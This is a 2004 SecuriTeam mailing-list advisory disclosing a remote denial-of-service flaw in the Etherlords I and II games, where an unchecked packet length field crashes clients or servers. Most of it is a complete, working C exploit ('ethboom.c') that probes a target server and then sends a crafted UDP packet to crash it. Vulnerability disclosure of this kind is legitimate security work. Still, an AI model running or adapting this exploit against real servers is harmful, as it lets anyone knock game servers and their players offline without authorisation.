[NT] Remote DoS in Etherlords I and Etherlords II (Long Length Field)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
- Previous message: SecuriTeam: "[UNIX] phpBB SQL Injection Vulnerability (privmsg.php)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 30 Mar 2004 13:16:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Remote DoS in Etherlords I and Etherlords II (Long Length Field)
------------------------------------------------------------------------
SUMMARY
<http://www.etherlords.com/etherlords1/> Etherlords is a 3D turn based
game developed by <http://www.nival.com> Nival. Etherlords I was released
at November 2001, Etherlords I was released in October 2003.
An unchecked buffer allows a remote user to crash game clients or the game
server.
DETAILS
Vulnerable Systems:
* Etherlords I version 1.07 and less
* Etherlords II version 1.03 and less
The packet signed by the number 3 is usually sent by the server to the
client and contains a 16 bit value at offset 9 used to specify the size of
the data block that follows it.
Providing a big number in the 'length' field will cause the game to crash
due to reading the unallocated memory after the packet.
Vulnerable Code:
The following memcpy() instruction comes from Etherlords II 1.03 and is
exactly where the bug happens:
:0076FD4B C1E902 shr ecx, 02
:0076FD4E F3A5 rep movsd
:0076FD50 8BCA mov ecx, edx
:0076FD52 83E103 and ecx, 003
:0076FD55 F3A4 rep movsb
The nice thing is that the packet 3 can also be used versus the server
that accept it and will crash in the same way.
Exploit Code:
The exploit code requires
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html> winerr.h
//ethboom.c
/*
by Luigi Auriemma
UNIX & WIN VERSION
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 9990
#define TIMEOUT 5
#define INFO "\x02" "\xde\xad\xc0\xde"
#define PCK "\x03" \
"\x00\x00\x00\x00" \
"\x00\x31\x14\x45" \
"\xff\xff" /* BOOM */
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
int sd,
len,
psz;
u_short port = PORT;
u_char *buff;
struct sockaddr_in peer;
setbuf(stdout, NULL);
fputs("\n"
"Etherlords 1 (1.07) and 2 (1.03) server crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
printf("\nTarget %s:%hu\n\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
fputs("- Getting informations:\n", stdout);
if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer,
psz)
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: socket timeout, probably the server is not
online\n", stdout);
exit(1);
}
buff = malloc(BUFFSZ);
if(!buff) std_err();
if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
< 0) std_err();
if(*buff == 3) {
len = buff[11] >> 1;
printf(" Players: %lu\n", *(u_long *)(buff + len + 12));
buff[len + 12] = 0x00;
printf(" Admin nickname: %s\n", buff + 12);
printf(" Resource level: %lu\n", *(u_long *)(buff + len + 12 +
4));
} else {
fputs("\nError: Wrong packet from the server, I exit\n", stdout);
exit(1);
}
fputs("- Sending BOOM packet:\n", stdout);
if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, psz)
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!!!!!\n", stdout);
} else {
fputs("\nServer doesn't seem to be vulnerable\n", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@altervista.org> Luigi
Auriemma.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] phpBB SQL Injection Vulnerability (privmsg.php)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
